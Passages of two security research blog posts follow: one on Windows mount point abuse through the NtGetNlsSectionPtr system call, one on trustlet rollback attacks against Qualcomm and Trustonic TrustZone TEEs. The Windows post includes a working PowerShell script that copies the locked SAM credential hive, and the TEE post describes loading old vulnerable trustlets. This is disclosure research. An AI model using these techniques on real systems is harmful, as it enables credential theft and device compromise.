It works and we’ve successfully created the arbitrary directory. Just to check we use Get-Acl to get the Security Descriptor of the directory and we can see that the owner is the ‘user’ account which means we can get full access to the directory.Now the problem is what to do with this ability? There’s no doubt some system service which might look up in a list of directories for an executable to run or a configuration file to parse. But it’d be nice not to rely on something like that. As the title suggested instead we’ll convert this into an arbitrary file read, how might do we go about doing that?Mount Point AbuseIf you’ve watched my talk on Abusing Windows Symbolic Links you’ll know how NTFS mount points (or sometimes Junctions) work. The $REPARSE_POINT NTFS attribute is stored with the Directory which the NTFS driver reads when opening a directory. The attribute contains an alternative native NT object manager path to the destination of the symbolic link which is passed back to the IO manager to continue processing. This allows the Mount Point to work between different volumes, but it does have one interesting consequence. Specifically the path doesn’t have to actually to point to another directory, what if we give it a path to a file?
If you use the Win32 APIs it will fail and if you use the NT apis directly you’ll find you end up in a weird paradox. If you try and open the mount point as a file the error will say it’s a directory, and if you instead try to open as a directory it will tell you it’s really a file. Turns out if you don’t specify either FILE_DIRECTORY_FILE or FILE_NON_DIRECTORY_FILE then the NTFS driver will pass its checks and the mount point can actually redirect to a file.
Perhaps we can find some system service which will open our file without any of these flags (if you pass FILE_FLAG_BACKUP_SEMANTICS to CreateFile this will also remove all flags) and ideally get the service to read and return the file data?National Language SupportWindows supports many different languages, and in order to support non-unicode encodings still supports Code Pages. A lot is exposed through the National Language Support (NLS) libraries, and you’d assume that the libraries run entirely in user mode but if you look at the kernel you’ll find a few system calls here and there to support NLS. The one of most interest to this blog is the NtGetNlsSectionPtr system call. This system call maps code page files from the System32 directory into a process’ memory where the libraries can access the code page data. It’s not entirely clear why it needs to be in kernel mode, perhaps it’s just to make the sections shareable between all processes on the same machine. Let’s look at a simplified version of the code, it’s not a very big function:
NTSTATUS NtGetNlsSectionPtr(DWORD NlsType,                            DWORD CodePage,
                           PVOID *SectionPointer,                            PULONG SectionSize) {
 UNICODE_STRING section_name;
 OBJECT_ATTRIBUTES section_obj_attr;
 HANDLE section_handle;
 RtlpInitNlsSectionName(NlsType, CodePage, &section_name);
 InitializeObjectAttributes(&section_obj_attr,                             &section_name,
                            OBJ_KERNEL_HANDLE |                             OBJ_OPENIF |                             OBJ_CASE_INSENSITIVE |                             OBJ_PERMANENT);
    
 // Open section under \NLS directory.
 if (!NT_SUCCESS(ZwOpenSection(&section_handle,                         SECTION_MAP_READ,                         &section_obj_attr))) {
   // If no section then open the corresponding file and create section.
   UNICODE_STRING file_name;    OBJECT_ATTRIBUTES obj_attr;
   HANDLE file_handle;
   RtlpInitNlsFileName(NlsType,                        CodePage,                        &file_name);
   InitializeObjectAttributes(&obj_attr,                               &file_name,
                              OBJ_KERNEL_HANDLE |                               OBJ_CASE_INSENSITIVE);
   ZwOpenFile(&file_handle, SYNCHRONIZE,               &obj_attr, FILE_SHARE_READ, 0);
   ZwCreateSection(&section_handle, FILE_MAP_READ,                    &section_obj_attr, NULL,                    PROTECT_READ_ONLY, MEM_COMMIT, file_handle);
   ZwClose(file_handle);
 }

 // Map section into memory and return pointer.
 NTSTATUS status = MmMapViewOfSection(                      section_handle,
                     SectionPointer,
                     SectionSize);
 ZwClose(section_handle);
 return status;
}
The first thing to note here is it tries to open a named section object under the \NLS directory using a name generated from the CodePage parameter. To get an idea what that name looks like we’ll just list that directory:

The named sections are of the form NlsSectionCP<NUM> where NUM is the number of the code page to map. You’ll also notice there’s a section for a normalization data set. Which file gets mapped depends on the first NlsType parameter, we don’t care about normalization for the moment. If the section object isn’t found the code builds a file path to the code page file, opens it with ZwOpenFile and then calls ZwCreateSection to create a read-only named section object. Finally the section is mapped into memory and returned to the caller.
There’s two important things to note here, first the OBJ_FORCE_ACCESS_CHECK flag is not being set for the open call. This means the call will open any file even if the caller doesn’t have access to it. And most importantly the final parameter of ZwOpenFile is 0, this means neither FILE_DIRECTORY_FILE or FILE_NON_DIRECTORY_FILE is being set. Not setting these flags will result in our desired condition, the open call will follow the mount point redirection to a file and not generate an error. What is the file path set to? We can just disassemble RtlpInitNlsFileName to find out:
void RtlpInitNlsFileName(DWORD NlsType,                         DWORD CodePage,                         PUNICODE_STRING String) {
 if (NlsType == NLS_CODEPAGE) {
    RtlStringCchPrintfW(String,              L"\\SystemRoot\\System32\\c_%.3d.nls", CodePage);
 } else {
    // Get normalization path from registry.
    // NOTE about how this is arbitrary registry write to file.
 }
}
The file is of the form c_<NUM>.nls under the System32 directory. Note that it uses the special symbolic link \SystemRoot which points to the Windows directory using a device path format. This prevents this code from being abused by redirecting drive letters and making it an actual vulnerability. Also note that if the normalization path is requested the information is read out from a machine registry key, so if you have an arbitrary registry value writing vulnerability you might be able to exploit this system call to get another arbitrary read, but that’s for the interested reader to investigate.
I think it’s clear now what we have to do, create a directory in System32 with the name c_<NUM>.nls, set its reparse data to point to an arbitrary file then use the NLS system call to open and map the file. Choosing a code page number is easy, 1337 is unused. But what file should we read? A common file to read is the SAM registry hive which contains logon information for local users. However access to the SAM file is usually blocked as it’s not sharable and even just opening for read access as an administrator will fail with a sharing violation. There’s of course a number of ways you can get around this, you can use the registry backup functions (but that needs admin rights) or we can pull an old copy of the SAM from a Volume Shadow Copy (which isn’t on by default on Windows 10). So perhaps let’s forget about… no wait we’re in luck.
File sharing on Windows files depends on the access being requested. For example if the caller requests Read access but the file is not shared for read access then it fails. However it’s possible to open a file for certain non-content rights, such as reading the security descriptor or synchronizing on the file object, rights which are not considered when checking the existing file sharing settings. If you look back at the code for NtGetNlsSectionPtr you’ll notice the only access right being requested for the file is SYNCHRONIZE and so will always allow the file to be opened even if locked with no sharing access.
But how can that work? Doesn’t ZwCreateSection need a readable file handle to do the read-only file mapping. Yes and no. Windows file objects do not really care whether a file is readable or writable. Access rights are associated with the handle created when the file is opened. When you call ZwCreateSection from user-mode the call eventually tries to convert the handle to a pointer to the file object. For that to occur the caller must specify what access rights need to be on the handle for it to succeed, for a read-only mapping the kernel requests the handle has Read Data access. However just as with access checking with files if the kernel calls ZwCreateSection access checking is disabled including when converting a file handle to the file object pointer. This results in ZwCreateSection succeeding even though the file handle only has SYNCHRONIZE access. Which means we can open any file on the system regardless of it’s sharing mode and that includes the SAM file.
So let’s put the final touches to this, we create the directory \SystemRoot\System32\c_1337.nls and convert it to a mount point which redirects to \SystemRoot\System32\config\SAM. Then we call NtGetNlsSectionPtr requesting code page 1337, which creates the section and returns us a pointer to it. Finally we just copy out the mapped file memory into a new file and we’re done.
$dir = "\SystemRoot\system32\c_1337.nls"
New-Directory $dir
 
$target_path = "\SystemRoot\system32\config\SAM"
Use-NtObject($file = Get-NtFile $dir `             -Options OpenReparsePoint,DirectoryFile) {
 $file.SetMountPoint($target_path, $target_path)
}

Use-NtObject($map =     [NtApiDotNet.NtLocale]::GetNlsSectionPtr("CodePage", 1337)) {
 Use-NtObject($output = [IO.File]::OpenWrite("sam.bin")) {
   $map.GetStream().CopyTo($output)
   Write-Host "Copied file"
 }
}
Loading the created file in a hex editor shows we did indeed steal the SAM file.

For completeness we’ll clean up our mess. We can just delete the directory by opening the directory file with the Delete On Close flag and then closing the file (making sure to open it as a reparse point otherwise you’ll try and open the SAM again). For the section as the object was created in our security context (just like the directory) and there was no explicit security descriptor then we can open it for DELETE access and call ZwMakeTemporaryObject to remove the permanent reference count set by the original creator with the OBJ_PERMANENT flag.
Use-NtObject($sect = Get-NtSection \nls\NlsSectionCP1337 `
                   -Access Delete) {
 # Delete permanent object.
 $sect.MakeTemporary()
}Wrap-UpWhat I’ve described in this blog post is not a vulnerability, although certainly the code doesn’t seem to follow best practice. It’s a system call which hasn’t changed since at least Windows 7 so if you find yourself with an arbitrary directory creation vulnerability you should be able to use this trick to read any file on the system regardless of whether it’s already open or shared. I’ve put the final script on GITHUB at this link if you want the final version to get a better understanding of how it works.
It’s worth keeping a log of any unusual behaviours when you’re reverse engineering a product in case it becomes useful as I did in this case. Many times I’ve found code which isn’t itself a vulnerability but have has some useful properties which allow you to build out exploitation chains.
Categories: Security

Trust Issues: Exploiting TrustZone TEEs

Mon, 07/24/2017 - 12:39
Posted by Gal Beniamini, Project Zero
Mobile devices are becoming an increasingly privacy-sensitive platform. Nowadays, devices process a wide range of personal and private information of a sensitive nature, such as biometric identifiers, payment data and cryptographic keys. Additionally, modern content protection schemes demand a high degree of confidentiality, requiring stricter guarantees than those offered by the “regular” operating system.
In response to these use-cases and more, mobile device manufacturers have opted for the creation of a “Trusted Execution Environment” (TEE), which can be used to safeguard the information processed within it. In the Android ecosystem, two major TEE implementations exist - Qualcomm’s QSEE and Trustonic’s Kinibi (formerly <t-base). Both of these implementations rely on ARM TrustZone security extensions in order to facilitate a small “secure” operating system, within which “Trusted Applications” (TAs) may be executed.
In this blog post we’ll explore the security properties of the two major TEEs present on Android devices. We’ll see how, despite their highly sensitive vantage point, these operating systems currently lag behind modern operating systems in terms of security mitigations and practices. Additionally, we’ll discover and exploit a major design issue which affects the security of most devices utilising both platforms. Lastly, we’ll see why the integrity of TEEs is crucial to the overall security of the device, making a case for the need to increase their defences.
Unfortunately, the design issue outlined in this blog post is difficult to address, and at times cannot be fixed without introducing additional dedicated hardware or performing operations that risk rendering devices unusable. As a result, most Qualcomm-based devices and all devices using Trustonic’s Kinibi TEE versions prior to 400 (that is, all Samsung Exynos devices other than the Galaxy S8 and S8 Plus) remain affected by this issue. We hope that by raising awareness to this issue we will help push for a more secure designs in the future.
I would like to note that while the current designs being reviewed may be incompatible with some devices’ use-cases, improved designs are being developed as a result of this research which may be accessible to a larger proportion of devices.TrustZone TEEs
TrustZone forms a hardware-based security architecture which provides security mechanisms both on the main application processor, as well as across the SoC. TrustZone facilitates the creation of two security contexts; the “Secure World” and the “Normal World”. Each physical processor is split into two virtual processors, one for each of the aforementioned contexts.
As its name implies, the “Secure World” must remain protected against any attacks launched by the “Normal World”. To do so, several security policies are enforced by hardware logic that prevents the “Normal World” from accessing the “Secure World”’s resources. What’s more, as the current security state is accessible on the system bus, peripherals on the SoC can be designated to either world by simply sampling this value.
TrustZone’s software model provides each world with its own copies of both lower privilege levels -- EL0 and EL1. This allows for the execution of different operating system kernels simultaneously - one running in the “Secure World” (S-EL1), while another runs in the “Normal World” (EL1). However, the world-split is not entirely symmetrical; for example, the hypervisor extensions (EL2) are not available in the “Secure World”.
*TOS: Trusted Operating System
On Android devices, TrustZone technology is used among other things to implement small “security-conscious” operating systems within which a set of trusted applications (TAs) may be executed. These TrustZone-based TEEs are proprietary components and are provided by the device’s manufacturers.
To put it in context - what we normally refer to as “Android” in our day to day lives is merely the code running in the “Normal World”; the Linux Kernel running at EL1 and the user-mode applications running at EL0. At the same time, the TEE runs in the “Secure World”; the TEE OS runs in the “Secure World”’s EL1 (S-EL1), whereas trusted applications run under S-EL0.
Within the Android ecosystem, two major TEE implementations exist; Qualcomm’s “QSEE” and Trustonic’s “Kinibi”. These operating systems run alongside Android and provide several key features to it. These features include access to biometric sensors, hardware-bound cryptographic operations, a “trusted user-interface” and much more.
Since the “Secure World”’s implementation is closely tied to the hardware of the device and the available security mechanisms on the SoC, the TEE OSs require support from and integration with the earlier parts of the device’s bootchain, as well as low-level components such as the bootloader.
Lastly, as can be seen in the schematic above, in order for the “Normal World” to be able to interact with the TEE and the applications within it, the authors of the TEE must also provide user-libraries, daemons and kernel drivers for the “Normal World”. These components are then utilised by the “Normal World” in order to communicate with the TEE.Exploring the TEEs
Like any other operating system, the security of a Trusted Execution Environment is hinged upon the integrity of both its trusted applications, and that of the TEE OS’s kernel itself. The interaction with the TEE’s kernel is mostly performed by the trusted applications running under it. As such, the logical first step to assessing the security of the TEEs would be to get a foothold within the TEE itself.
To do so, we’ll need to find a vulnerability in a trusted application and exploit it to gain code execution. While this may sound like a daunting task, remember that trusted applications are merely pieces of software that process user-supplied data. These applications aren’t written in memory safe languages, and are executed within opaque environments - a property which usually doesn’t lend itself well to security.  
Bearing all this in mind, how can we start analysing the trusted applications in either of these platforms? Recall that the implementations are proprietary, so even the file formats used to store the applications may not be public.
Indeed, in Qualcomm’s case the format used to store the applications was not documented until recently. Nonetheless, some attempts have been made to reverse engineer the format resulting in tools that allow converting the proprietary file format into a regular ELF file. Once an ELF file is produced, it can subsequently be analysed using any run-of-the-mill disassembler. What’s more, in a recent positive trend of increased transparency, Qualcomm has released official documentation detailing the file format in its entirety, allowing more robust research tools to be written as a result.
As for Trustonic, the trusted applications’ loadable format is documented within Trustonic’s publically available header files. This saves us quite some hassle. Additionally, some plugins are available to help load these applications into popular disassemblers such as IDA.

Now that we’ve acquired the tools needed to inspect the trusted applications, we can proceed on to the next step - acquiring the trustlet images (from a firmware image or from the device), converting them to a standard format, and loading them up in a disassembler.
However, before we do so, let’s take a moment to reflect on the trustlet model!Revisiting the Trustlet Model
To allow for increased flexibility, modern TEEs are designed to be modular, rather than monolithic chunks of code. Each TEE is designed as a “general-purpose” operating system, capable of loading arbitrary trustlets (conforming to some specification) and executing them within a “trusted environment”.  What we refer to as a TEE is the combination of the TEE’s operating system, as well as the applications running within it.
There are many advantages to this model. For starters, changes to a single trustlet only require updating the application’s binary on the filesystem, without necessitating any change in other components of the TEE. This also allows for the creation of a privilege separation model, providing certain privileges to some trustlets while denying them to others. Perhaps most importantly, this enables the TEE OS to enforce isolation between the trustlets themselves, thus limiting the potential damage done by a single malicious (or compromised) trustlet. Of course, while in principle these advantages are substantial, we’ll see later on how they actually map onto the TEEs in question.
Regardless, while the advantages of this model are quite clear, they are not completely free of charge. Recall, as we’ve mentioned above, that trusted applications are not invulnerable. Once vulnerabilities are found in these applications, they can be used to gain code execution within the TEE (in fact, we’ll write such an exploit later on!).
However, this begs the question - “How can trustlets be revoked once they’ve been found to be vulnerable?”. After all, simply fixing a vulnerability in a trustlet would be pointless if an attacker could load old vulnerable trustlets just as easily.
To answer this question, we’ll have to separately explore each TEE implementation. QSEE Revocation
As we’ve mentioned above, Qualcomm has recently released (excellent) documentation detailing the secure boot sequence on Qualcomm devices, including the mechanisms used for image authentication. As trusted applications running under QSEE are part of the same general architecture described in this document, we may gain key insights into the revocation process by reviewing the document.
Indeed, Qualcomm’s signed images are regular ELF files which are supplemented by a single special “Hash Table Segment”. This segment includes three distinct components: the SHA-256 digest of each ELF segment, a signature blob, and a certificate chain.


The signature is computed over the concatenated blob of SHA-256 hashes, using the private key corresponding to the last certificate in the embedded certificate chain. Moreover, the root certificate in the chain is validated against a “Root Key Hash” which is stored in the device’s ROM or fused into one-time-programmable memory on the SoC.
Reading through the document, we quickly come across the following relevant statement:
“The Attestation certificate used to verify the signature on this hash segment also includes additional fields that can bind restrictions to the signature (preventing “rolling back” to older versions of the software image, …”
Ah-ha! Well, let’s keep reading and see if we come across more pertinent information regarding the field in question.
Continuing our review of the document, it appears that Qualcomm has elected to add unique OU fields to the certificates in the embedded chain, denoting several attributes relating to the signature algorithm of the image being loaded. One such field of particular interest to our pursuits is the “SW_ID”. According to the document, this field is used to “bind the signature to a particular version of a particular software image”. Interesting!
The field is comprised of two concatenated values:

The document then goes on to explain:
“...If eFuse values indicated that the current version was ‘1’, then this image would fail verification. Version enforcement is done in order to prevent loading an older, perhaps vulnerable, version of the image that has a valid signature attached.”
At this point we have all the information we need. It appears that the subject of image revocation has not eluded Qualcomm -- we’re already off to a good start. However, there are a few more questions in need of an answer yet!
Let’s start by taking a single trustlet, say the Pixel’s Widevine trustlet, and inspecting the value of the SW_ID field encoded in its attestation certificate. As this is a DER-encoded X.509 certificate, we can parse it using “openssl”:

As we can see above, the IMAGE_ID value assigned to the Widevine trustlet is 0xC. But what about the other trustlets in the Pixel’s firmware? Inspecting them reveals a surprising fact -- all trustlets share the same image identifier.
More importantly, however, it appears that the version counter in the Widevine application on the Pixel is 0. Does this mean that no vulnerabilities or other security-relevant issues have been found in that trustlet since the device first shipped? That seems like a bit of a stretch. In order to get a better view of the current state of affairs, we need a little more data.
Luckily, I have a collection of firmware images that can be used for this exact purpose! The collection contains more than 45 different firmware images from many different vendors, including Google, Samsung, LG and Motorola. To collect the needed data, we can simply write a short script to extract the version counter from every trustlet in every firmware image. Running this script on the firmware collection would allow us to assess how many devices have used the trustlet revocation feature in the past to revoke any vulnerable trusted application (since their version counter would have to be larger than zero).
After running the script on my firmware collection, we are greeted with a surprising result: with the exception of a single firmware image, all trustlets in all firmware images contain version number 0.
Putting it all together, this would imply one of two things: either no bugs are ever found in any trustlet, or device manufacturers are failing to revoke vulnerable trustlets.
In fact, we already know the answer to this question. Last year I performed research into the Widevine trustlet as present on the Nexus 6 and found (and exploited) a vulnerability allowing arbitrary code execution within the TEE.
This same vulnerability was also present on a wide variety of other devices from different manufactures, some of whom are also a part of my firmware collection. Nonetheless, all of these devices in my collection (including the Nexus 6) did not revoke the vulnerable trustlet, and as such have remained vulnerable to this issue. While some devices (such as the Nexus 6) have shipped patched versions of the trustlet, simply providing a patched version without incrementing the version counter has no effect whatsoever.
While I do not have a sufficiently large firmware collection to perform a more in-depth analysis, previous assessments have been done regarding the amount of affected devices. Regardless, it remains unknown what proportion of these devices have correctly revoked the trustlet.
As it happens, exploiting the issue on “patched” devices is extremely straightforward, and does not require any more privileges than those required by the original version of the exploit. All an attacker would need to do is to place the old trustlet anywhere on the filesystem, and change the path of the trustlet in the exploit (a single string) to point at that new location (you can find example of such an exploit here).
One might be tempted to suggest several stop-gap mitigations, such as filtering the filesystem path from which trustlets are loaded to ensure that they only originate from the system partition (thus raising the bar for a would-be attacker). However, due to the design of the API used to load trustlets, it seems that filtering the filesystem path from which the trustlet is loaded is not feasible. This is since QSEECOM, the driver provided by Qualcomm to interact with QSEE, provides a simple API wherein it is only provided with a buffer containing the trustlet’s binary by user-space. This buffer is then passed on to TrustZone in order for the trustlet to be authenticated and subsequently loaded. Since the driver only receives a blob containing the trustlet itself, it has no “knowledge” of the filesystem path on which the trustlet is stored, making such verification of the filesystem path harder.
Of course, interaction with QSEECOM is restricted to several SELinux contexts. However, a non-exhaustive list of these includes the media server, DRM server, KeyStore, volume daemon, fingerprint daemon and more. Not a short list by any stretch…
So what about devices unaffected by the previously disclosed Widevine vulnerability? It is entirely possible that these devices are affected by other bugs; either still undiscovered, or simply not public. It would certainly be surprising if no bugs whatsoever have been found in any of the trustlets on these devices in the interim.
For example, diffing two versions of the Widevine trustlet in the Nexus 6P shows several modifications, including changes in functions related to key verification. Investigating these changes, however, would require a more in-depth analysis of Widevine and is beyond the scope of this blog post.


Putting all of the above together, it seems quite clear that device manufacturers are either unaware of the revocation features provided by Qualcomm, or are unable to use them for one reason or another.
In addition to the mechanism described above, additional capabilities are present in the case of trustlet revocation. Specifically, on devices where a replay protected memory block (RPMB) is available, it can be utilised to store the version numbers for trustlets, instead of relying on an eFuse. In this scenario, the APP_ID OU is used to uniquely identify each trusted application, allowing for a more fine-grained control over their revocation.
That being said, in order to leverage this feature, devices must be configured with a specific eFuse blown. Since we cannot easily query the status of eFuses on a large scale, it remains unknown what proportion of devices have indeed enabled this feature. Perhaps one explanation for the lack of revocation is that some devices are either lacking a RPMB, or have not blown the aforementioned eFuse in advance (blowing a fuse on a production device may be a risky operation).
What’s more, going over our firmware collection, it appears that some manufacturers have an incomplete understanding of the revocation feature. This is evidenced by the fact that several firmware images use the same APP_ID for many (and sometimes all) trusted applications, thus preventing the use of fine-grained revocation.
There are other challenges as well - for example, some vendors (such as Google) ship their devices with an unlocked bootloader. This allows users to freely load any firmware version onto the device and use it as they please. However, revoking trustlets would strip users of the ability to flash any firmware version, as once a trustlet is revoked, firmware versions containing trustlets from the previous versions would no longer pass the authentication (and would therefore fail to load). As of now, it seems that there is no good solution for this situation. Indeed, all Nexus and Pixel devices are shipped with an unlocked bootloader, and are therefore unable to make use of the trustlet revocation feature as present today.
One might be tempted once again to suggest naive solutions, such as embedding a whitelist of “allowed” trustlet hashes in the TEE OS’s kernel itself. Thus, when trustlets are loaded, they may also be verified against this list to ensure they are allowed by the current version TEE OS. This suggestion is not meritless, but is not robust either. For starters, this suggestion would require incrementing the version counter for the TEE OS’s image (otherwise attackers may rollback that binary as well). Therefore, this method suffers from some of the same drawbacks of the currently used approach (for starters, devices with an unlocked bootloader would be unable to utilise it). It should be noted, however, that rewriting the TEE OS’s image would generally require raw access to the filesystem, which is strictly more restrictive than the current permissions needed to carry out the attack.
Nonetheless, a better solution to this problem (rather than a stop-gap mitigation) is still needed. We hope that by underscoring all of these issues plaguing the current implementation of the revocation feature (leading to it being virtually unused for trustlet revocation), the conversation will shift towards alternate models of revocation that are more readily available to manufacturers. We also hope that device manufacturers that are able to use this feature, will be motivated to do so in the future.
Kinibi Revocation
Now, let’s set our sights on Trustonic’s Kinibi TEE. In our analysis, we’ll use the Samsung Galaxy S7 Edge (SM-G935F) - this is an Exynos-based device running Trustonic’s TEE version 310B. As we’ve already disclosed an Android privilege escalation vulnerability a few months ago, we can use that vulnerability in order to get elevated code execution with the “system_server” process on Android. This allows us greater freedom in exploring the mechanisms used in the “Normal World” related to Trustonic’s TEE.
Unfortunately, unlike Qualcomm, no documentation is available for the image authentication process carried out by Trustonic’s TEE. Be that as it may, we can still start our research by inspecting the trustlet images themselves. If we can account for every single piece of data stored in the trustlet binary, we should be able to identify the location of any version counter (assuming, of course, such a counter exists).
As we’ve mentioned before, the format used by trusted applications in Trustonic’s TEE is documented in their public header files. In fact, the format itself is called the “MobiCore Loadable Format” (MCLF), and harkens back to G&D’s MobiCore TEE, from which Trustonic’s TEE has evolved.
Using the header files and inspecting the binary in tandem, we can piece together the entire format to store the trustlet’s metadata as well as its code and data segments. As a result, we arrive at the following layout:

At this point, we have accounted for all but a single blob in the trustlet’s binary - indeed, as shown in the image above, following the data segment, there appears to be an opaque blob of some sort. It would stand to reason that this blob would represent the trustlet’s signature (as otherwise that would imply that unsigned trusted applications could be loaded into the TEE). However, since we’d like to make sure that all bits are accounted for, we’ll need to dig deeper and make sure that is the case.
Unfortunately, there appear to be no references in the header files to a blob of this kind. With that in mind, how can we make sure that this is indeed the trustlet’s signature? To do so we’ll need to reverse engineer the loading code within the TEE OS responsible for authenticating and loading trusted applications. Once we identify the relevant code, we should be able to isolate the handling of the signature blob and deduce its format.
At this point, however, this is easier said than done. We still have no knowledge of where the TEE OS’s binary is stored, how it may be extracted, and what code is responsible for loading it into place. However, some related work has been done in the past. Specifically, Fernand Lone Sang of Quarkslab has published a two-part article on reverse-engineering Samsung’s SBOOT on the Galaxy S6. While his work is focused on analysing the code running in EL3 (which is based on ARM’s Trusted Firmware), we’re interested in dissecting the code running in S-EL1 (namely, the TEE OS).
By applying the same methodology described by Fernand, we can load the SBOOT binary from an extracted firmware image into IDA and begin analysing it. Since SBOOT is based on ARM’s Trusted Firmware architecture, all we’d need to do is follow the logic up to the point at which the TEE OS is loaded by the bootloader. This component is also referred to as “BL32” in the ARM Trusted Firmware terminology.

After reversing the relevant code flows, we finally find the location of the TEE OS’s kernel binary embedded within the SBOOT image! In the interest of brevity, we won’t include the entire process here. However, anyone wishing to extract the binary for themselves and analyse it can simply search for the string “VERSION_-+A0”, which denotes the beginning of the TEE OS’s kernel image. As for the image’s base address - by inspecting the absolute branches and the address of the VBAR in the kernel we can deduce that it is loaded into virtual address 0x7F00000.
Alternatively, there exists another (perhaps much easier) way to inspect Kinibi’s kernel. It is a well known fact that Qualcomm supports the execution of not one, but two TEEs simultaneously. Samsung devices based on Qualcomm’s SoCs make use of this feature by loading both QSEE and Kinibi at the same time. This allows Samsung to access features from both TEEs on the same device. However, we’ve already seen how images loaded by Qualcomm’s image authentication module can be converted into regular ELF files (and subsequently analysed). Therefore, we can simply apply the same process to convert Kinibi’s kernel (“tbase”, as present on Samsung’s Qualcomm-based devices) into an ELF file which can then be readily analysed.
Since the file format of trusted applications running under Kinibi TEE on Qualcomm devices appears identical to the one used on Exynos, that would suggest that whatever authentication code is present in one, is also present in the other.
After some reversing, we identify the relevant logic responsible for authenticating trusted applications being loaded into Kinibi. The microkernel first verifies the arguments in the MCLF header, such as its “magic” value (“MCLF”). Next, it inspects the “service type” of the image being loaded. By following the code’s flow we arrive at the function used to authenticate both system trustlets and drivers - just what we’re after! After analysing this function’s logic, we finally arrive at the structure of the signature blob:

The function extracts the public key information (the modulus and the public exponent). Then, it calculates the SHA-256 digest of the public key and ensures that it matches the public key hash embedded in the kernel’s binary. If so, it uses the extracted public key together with the embedded signature in the blob to verify the signature on the trustlet itself (which is performed on its entire contents up to the signature blob). If the verification succeeds, the trustlet is loaded.
At long last, we are finally able to account for every single bit in the trustlet. But… Something appears to be amiss - where is the version counter located? Out of the entire trustlet’s binary, there is but a single value which may serve this purpose -- the “Service Version” field in the MCLF header. However, it certainly doesn’t seem like this value is being used by the loading logic we traced just a short while ago. Nevertheless, it’s possible that we’ve simply missed some relevant code.
Regardless, we can check whether any revocation using this field is taking place in practice by leveraging our firmware collection once again! Let’s write a short script to extract the service version field from every trusted application and run it against the firmware repository…
...And the results are in! Every single trusted application in my firmware repository appears to use the same version value - “0”. While there are some drivers that use a different value, it appears to be consistent across devices and firmware versions (and therefore doesn’t seem to represent a value used for incremental versions or for revocation). All in all, it certainly seems as though no revocation it taking place.
But that’s still not enough quite enough. To ensure that no revocation is performed, we’ll need to try it out for ourselves by loading a trustlet from an old firmware version into a more recent version.
To do so, we’ll need to gain some insight into the user-mode infrastructure provided by Trustonic. Let’s follow the execution flow through the process of loading a trustlet - starting at the “Normal World” and ending in the “Secure World”’s TEE. Doing so will help us figure out which user-mode components we’ll need to interact with in order to load our own trustlet.
When a privileged user-mode process wishes to load a trusted application, they do so by sending a request to a special daemon provided by Trustonic - “mcDriverDaemon”. This daemon allows clients to issue requests to the TEE (which are then routed to Trustonic’s TEE driver). One such command can be used to load a trustlet into the TEE.
The daemon may load trustlets from one of two paths - either from the system partition ("/system/app/mcRegistry"), or from the data partition ("/data/app/mcRegistry"). Since in our case we would like to avoid modifying the system partition, we will simply place our binary in the latter path (which has an SELinux context of “apk_data_file”).
While the load request itself issued to the daemon specifies the UUID of the trustlet to be loaded, the daemon only uses the UUID to locate the binary, but does not ensure that the given UUID matches the one encoded in the trustlet's header. Therefore, it’s possible to load any trustlet (regardless of UUID) by placing a binary with an arbitrary UUID (e.g., 07050501000000000000000000000020) in the data partition's registry directory, and subsequently sending a load request with the same UUID to the daemon.

Lastly, the communication with the daemon is done via a UNIX domain socket. The socket has an SELinux context which limits the number of processes that can connect to it. Nonetheless, much like in Qualcomm’s case, the list of such processes seems to include the majority of privileged processes running on the system. Indeed, a very partial list of which includes the DRM server, system server, the volume daemon, mediaserver and indeed any system application (you can find the full list in the issue tracker).
From then on, the daemon simply contacts Trustonic’s driver and issues a specific set of ioctls which cause it to pass on request to the TEE. It should be noted that access to the driver is also available to quite a wide range of processes (once again, the full list can be seen in the issue tracker).
Now that we’re sufficiently informed about the loading process, we can go ahead and attempt to load an old trustlet. Let’s simply take an old version of the “fingerprint” trustlet and place it into the registry directory under the data partition. After issuing a load request to the daemon and following the dmesg output, we are greeted with the following result:

There we have it -- the trustlet has been successfully loaded into the TEE, confirming our suspicions!
After contacting Samsung regarding this issue, we’ve received the following official response:
“Latest Trustonic kinibi 400 family now supports rollback prevention feature for trustlets and this is fully supported since Galaxy S8/S8+ devices”
Indeed, it appears that the issue has been addressed in the newest version on Trustonic’s TEE - Kinibi 400. Simply searching for relevant strings in the TEE OS binary provided in the Galaxy S8’s firmware reveals some possible hints as to the underlying implementation:

Based on these strings alone, it appears that newer devices utilise a replay protected memory block (RPMB) in order to prevent old trustlets from being rolled back. As the implementation is proprietary, more research is needed in order to determine how this feature is implemented.
With regards to Samsung devices - although revocation appears to be supported in the Galaxy S8 and S8 Plus, all other Exynos-based devices remain vulnerable to this issue. In fact, in the next part we’ll write an exploit for a TEE vulnerability. As it happens, this same vulnerability is present in several different devices, including the Galaxy S7 Edge and Galaxy S6.
Without specialised hardware used to store the version counter or some other identifier which can be utilised to prevent rollback, it seems like there is not much that can be done to address the issue in older devices. Nonetheless, as we have no visibility into the actual security components on the SoC, it is not clear whether a fix is indeed not possible. Perhaps other hardware components could be co-opted to implement some form of revocation prevention. We remain hopeful that a stop-gap mitigation may be implemented in the future.Deciding On A Target
To make matters more interesting, let’s try and identify an “old” vulnerable trustlet (one which has already been “patched” in previous versions). Once we find such a trustlet, we could simply insert it into the registry and load it into the TEE. As it happens, finding such trustlets is rather straightforward - all we have to do is compare the trustlets from the most recent firmware version with the ones in the first version released for a specific device -- if there have been any security-relevant fixes, we should be able to track them down.
In addition, we may also be able to use vulnerable trustlets from a different device. This would succeed only if both devices share the same “trusted” public key hash embedded in the TEE OS. To investigate whether such scenarios exist, I’ve written another script which extracts the modulus from each trustlet binary, and group together different firmware versions and devices that share the same signing key. After running this script it appears that both the Galaxy S7 Edge (G935F) and the Galaxy S7 (G930F) use the same signing key. As a result, attackers can load trustlets from either device into the other (therefore expanding the list of possible vulnerable trustlets that can be leveraged to attack the TEE).
After comparing a few trusted applications against their older versions, it is immediately evident that there’s a substantial number of security-relevant fixes. For example, a cursory comparison between the two versions of the the “CCM” trustlet (FFFFFFFF000000000000000000000012), revealed four added bound-checks which appear to be security-relevant.


Alternately, we can draw upon previous research. Last year, while doing some cursory research into the trusted applications available on Samsung’s Exynos devices, I discovered a couple of trivial vulnerabilities in the “OTP” trustlet running under that platform. These vulnerabilities have since been “fixed”, but as the trustlets are not revoked, we can still freely exploit them.
In fact, let’s do just that.Writing A Quick Exploit
We’ve already determined that old trustlets can be freely loaded into Kinibi TEE (prior to version 400). To demonstrate the severity of this issue, we’ll exploit one of two vulnerabilities I’ve discovered in the OTP trustlet late last year. Although the vulnerability has been “patched”, attackers can simply follow the steps above to load the old version of the trustlet into the TEE and exploit it freely.  
